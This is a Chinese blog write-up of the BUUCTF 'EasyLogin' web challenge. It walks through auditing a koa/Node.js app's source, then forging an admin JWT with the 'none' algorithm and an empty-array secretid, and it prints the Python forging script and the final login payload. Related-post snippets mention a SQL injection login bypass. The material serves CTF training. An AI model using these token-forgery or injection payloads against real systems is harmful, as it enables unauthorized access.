BUUCTF WEB ESAYLOGIN

已于 2022-03-15 15:01:12 修改
阅读量5.5k 收藏
点赞数
分类专栏: BUUCTF 文章标签: web安全
于 2022-03-15 11:21:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41696858/article/details/123497996
版权

登录注册首想二次注入,但是注册成功以后发现连个回显点都没有,所以这条路就断了
然后随便注册一个账号,有个getflag按钮,点击发现权限不够。这里就想到要伪造身份绕过了
审计注册页面源码,发现/static/js/app.js目录
看看,发现hint

/**
 *  或许该用 koa-static 来处理静态文件
 *  路径该怎么配置?不管了先填个根目录XD
 */

百度一下,看看koa是个啥,原来是个nodejs的web框架

function login() {
    const username = $("#username").val();
    const password = $("#password").val();
    const token = sessionStorage.getItem("token");
    $.post("/api/login", {username, password, authorization:token})
        .done(function(data) {
            const {status} = data;
            if(status) {
                document.location = "/home";
            }
        })
        .fail(function(xhr, textStatus, errorThrown) {
            alert(xhr.responseJSON.message);
        });
}

function register() {
    const username = $("#username").val();
    const password = $("#password").val();
    $.post("/api/register", {username, password})
        .done(function(data) {
            const { token } = data;
            sessionStorage.setItem('token', token);
            document.location = "/login";
        })
        .fail(function(xhr, textStatus, errorThrown) {
            alert(xhr.responseJSON.message);
        });
}

function logout() {
    $.get('/api/logout').done(function(data) {
        const {status} = data;
        if(status) {
            document.location = '/login';
        }
    });
}

function getflag() {
    $.get('/api/flag').done(function(data) {
        const {flag} = data;
        $("#username").val(flag);
    }).fail(function(xhr, textStatus, errorThrown) {
        alert(xhr.responseJSON.message);
    });
}

关注一下/api/register
百度一下koa的框架结构
https://www.cnblogs.com/wangjiahui/p/12660093.html
发现app.js负责路由逻辑,真正的处理逻辑在controllers文件夹里,这里前面的/api就有效了,mvc都一个样
盲猜是api.js里的register函数负责处理注册逻辑
查看controllers/api.js

const crypto = require('crypto');
const fs = require('fs')
const jwt = require('jsonwebtoken')

const APIError = require('../rest').APIError;

module.exports = {
    'POST /api/register': async (ctx, next) => {
        const {username, password} = ctx.request.body;

        if(!username || username === 'admin'){
            throw new APIError('register error', 'wrong username');
        }

        if(global.secrets.length > 100000) {
            global.secrets = [];
        }

        const secret = crypto.randomBytes(18).toString('hex');
        const secretid = global.secrets.length;
        global.secrets.push(secret)

        const token = jwt.sign({secretid, username, password}, secret, {algorithm: 'HS256'});

        ctx.rest({
            token: token
        });

        await next();
    },

    'POST /api/login': async (ctx, next) => {
        const {username, password} = ctx.request.body;

        if(!username || !password) {
            throw new APIError('login error', 'username or password is necessary');
        }

        const token = ctx.header.authorization || ctx.request.body.authorization || ctx.request.query.authorization;

        const sid = JSON.parse(Buffer.from(token.split('.')[1], 'base64').toString()).secretid;

        console.log(sid)

        if(sid === undefined || sid === null || !(sid < global.secrets.length && sid >= 0)) {
            throw new APIError('login error', 'no such secret id');
        }

        const secret = global.secrets[sid];

        const user = jwt.verify(token, secret, {algorithm: 'HS256'});

        const status = username === user.username && password === user.password;

        if(status) {
            ctx.session.username = username;
        }

        ctx.rest({
            status
        });

        await next();
    },

    'GET /api/flag': async (ctx, next) => {
        if(ctx.session.username !== 'admin'){
            throw new APIError('permission error', 'permission denied');
        }

        const flag = fs.readFileSync('/flag').toString();
        ctx.rest({
            flag
        });

        await next();
    },

    'GET /api/logout': async (ctx, next) => {
        ctx.session.username = null;
        ctx.rest({
            status: true
        })
        await next();
    }
};

看来猜的不错,发现逻辑问题,注册的时候对用户名进行了过滤,不能是admin,但是登录的时候他只验证了一个jwt的token
那么这题就是一个JWT的构造
先抓个包看看TOKEN的结构,抓登录界面的包

username=zhaoxian&password=123&authorization=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzZWNyZXRpZCI6MCwidXNlcm5hbWUiOiJ6aGFveGlhbiIsInBhc3N3b3JkIjoiMTIzIiwiaWF0IjoxNjQ3MzExOTM2fQ.camQaQa82cDkFC4KUPjOSrGndaNr_BvcaRqbzScROlE

上jwt.io网站上去解析一下
回显
{
“alg”: “HS256”,
“typ”: “JWT”
}
{
“secretid”: 0,
“username”: “zhaoxian”,
“password”: “123”,
“iat”: 1647311936
}
本来想着直接把username改了看看上不上的去,回显
{“code”:“internal_error”,“message”:“invalid signature”},看来还是需要密钥的
先试试None攻击
写个python脚本

import jwt
token = jwt.encode(
{
  "secretid": [],
  "username": "admin",
  "password": "123",
  "iat": 1647311936
},
algorithm="none",key=""
)
print(token)

生成新token

eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJzZWNyZXRpZCI6W10sInVzZXJuYW1lIjoiYWRtaW4iLCJwYXNzd29yZCI6IjEyMyIsImlhdCI6MTY0NzMxMTkzNn0.

抓包再修改登陆成功
payload:

username=admin&password=123&authorization=eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJzZWNyZXRpZCI6W10sInVzZXJuYW1lIjoiYWRtaW4iLCJwYXNzd29yZCI6IjEyMyIsImlhdCI6MTY0NzMxMTkzNn0.

点击按钮即可
参考视频链接:https://www.bilibili.com/video/BV1MS4y1D7mb

显哥无敌
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF Reverse/[FlareOn4]login
ookami6497的博客
07-20 469
BUUCTF Reverse/[FlareOn4]login 下载得到一个txt文档以及一个HTML文件 txt文档里面是提示 打开HTML文件,又是一道字符串比较的题目,右键查看源代码 <!DOCTYPE Html /> <html> <head> <title>FLARE On 2017</title> </head> <body> <i
buuctf————[羊城杯 2020]login
yhfgs的博客
09-30 828
1.查壳。 无壳,64位。(当时还不知到PyInstaller ) 2.直接丢到IDA反编译。发现啥也没有。 (连个提示性的字符串也没有,但运行是有input something。很迷。) 看了看大佬的wp,才知道这是PyInstaller打包的exe,需要解包。 3.解包,反编译。 (1)解包; 下载PyInstaller Extractor(PyInstaller Extractor download | SourceForge.net) 把login.exe与下载得到的pyins.
BUUCTF-RE-2020-羊城杯 login
Henlenl的博客
09-24 1216
wp pyc RE 先用pyinstxtractor.py反编译为pyc文件 看到如下信息 但是注意 要对比login和struct头部的字节差异 将差异补上后 login这个文件加上.pyc后缀 然后就能用uncompyle6 将pyc反编译为python代码 # uncompyle6 version 3.7.4 # Python bytecode 3.6 (3379) # Decompiled from: Python 3.7.0 (v3.7.0:1bf9cc5093, Jun 27 2018,
buuctf login
qq_66455531的博客
03-16 199
buuctf login
[BUUCTF]login WP
designer545的博客
11-01 243
[BUUCTF]login WP
BUUCTF部分web题目
最新发布
05-06
### BUUCTF部分Web题目分析 #### WMCTF2020 Make PHP Great Again **题目背景**: 这道题目主要是考察PHP中的`require_once()`函数的使用以及如何利用符号链接来读取文件。 **核心知识点**: 1. **`require_once()...
BUUCTFweb之强网杯2019随便注
12-14
开始注入: 1’ : 报错 1’ #:回显正常 1’ order by 1 #: 正常(经测试列数为2–此处小白暗自窃喜) 1’ union select 1,2#: 回显 如图 看来此方法是行不通了,但经过苦苦寻求,了解到了堆叠注入: ...
BUUCTF-Web-Mark loves cat变量函数覆盖
02-16
【变量覆盖漏洞详解】 ...这类漏洞通常出现在以下几种情况: 1. **全局变量覆盖**: ...攻击者可以通过操纵这些请求参数来覆盖预定义的变量,造成安全风险。... ...2. **extract()函数使用不当**: `extract()`函数会从数组中...
BUUCTF逆向前八题
01-24
在本篇中,我们将探讨在BUUCTF储备赛中遇到的前八道逆向题目,通过这些题目来学习如何使用逆向工具,如exeinfo和IDA,以及如何解析汇编代码以获取关键信息。 1. Easyre: 这道题首先使用exeinfo查看文件信息,确认...
BasicASM.s(BUUCTF
06-04
分析过程文件
buuctf [ZJCTF 2019]Login
carol2358的博客
05-06 1120
先运行,输入admin和2jctf_pa5sw0rd, 发现报错,gdb开始调试 在这里crash了, 去ida里看 ida里自己改名字,原来的看着太乱 反向分析 在read_password里找到var_18 然后通过覆盖var_18, 让他跳到程序自带的shell里 60-18 = 48 e+3a = 48 exp: from pwn import * from LibcSearc...
buuctf——[FlareOn4]login
Nike_name的博客
10-07 229
reverse
BUUCTF——Web
2201_75331136的博客
07-11 986
启动靶机,出现这个用户登录页面 随便输入一个用户名和密码,通过网址可以判断出该请求方式使用万能密码测试是否存在SQL注入漏洞登录后便可查看到flagflag为:启动靶机,出现以下页面 查看源代码尝试在网址后面加上?cat=dog出现以下存在flag的页面flag为:启动靶机,出现以下页面查看源代码source.php 应该是后端的源码,这题代码审计了 源码中 给出了 两个文件,还有一个 hint.php,这里给出了flag的位置 得到flagflag为:启动靶机,出现以下界面点击tips跳转到flag.ph
buuctf web wp
qq_63267612的博客
04-10 505
文章目录[极客大挑战 2019]EasySQL [极客大挑战 2019]EasySQL 打开后是一个登录,直接尝试万能密码 (用户名:1’ or 1=1 # 密码:随便输) 登录得到flag 这里的万能密码是为什么呢? 数据库中的查询语句: select id from users where username = '' or 1=1-- and password = '456' 又 这里呢1=1永远为真,后面 and password = '456’被注释掉了。数据库不需要考虑,这里我们就跳
BUUCTF-- Linux Labs 1---SSH远程登陆
qq_51550750的博客
01-26 1575
BUUCTF-- Linux Labs 1 点击链接:
BUUCTF-EasyLogin
shawdow_bug的博客
07-15 973
这是一道 Node.js 语言的题目,在此记录我在做这道题的思考过程。
re学习笔记(57)BUUCTF-re-[FlareOn4]login
逆向随笔
04-02 1525
新手一枚,如有错误(不足)请指正,谢谢!! 题目链接:BUUCTF-re-[FlareOn4]login 下载下来是个html文件,F12查看源代码 大概意思就是匹配字符大小写字母,将前十三位与后十三位对换 写脚本 #include <stdio.h> char data[37] = "PyvragFvqrYbtvafNerRnfl@syner-ba.pbz"; int main(...
buuctf刷题记录6 [FlareOn4]login
ytj00的博客
07-30 739
打开是一个html文件,打开看是一个典型的输入验证问题 <!DOCTYPE Html /> <html> <head> <title>FLARE On 2017</title> </head> <body> <input type="text" name="flag" id="flag" value="Enter the flag" /> &
[BUUCTF]REVERSE——[FlareOn4]login
mcmuyanga的博客
11-26 927
[FlareOn4]login 附件 步骤: 是个网页,直接打开,查看网页源码 百度了几个函数 charCodeAt(0)是返回当前字符的Unicode 编码 String.fromCharCode返回Unicode对应的字符串 然后顺便了解到var rotFlag = flag.replace(/[a-zA-Z]/g, function(c){return String.fromCharCode((c <= "Z" ? 90 : 122) >= (c = c.charCodeAt(0) +
buuctf web
08-15
回答:根据引用和引用的内容,buuctf web应该是指buuctf比赛中的一个web题目。其中可能涉及到Tornado作为非阻塞式服务器的使用,以及render函数的使用。而根据引用的内容,buuctf web题目可能存在一些漏洞,比如SSRF...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值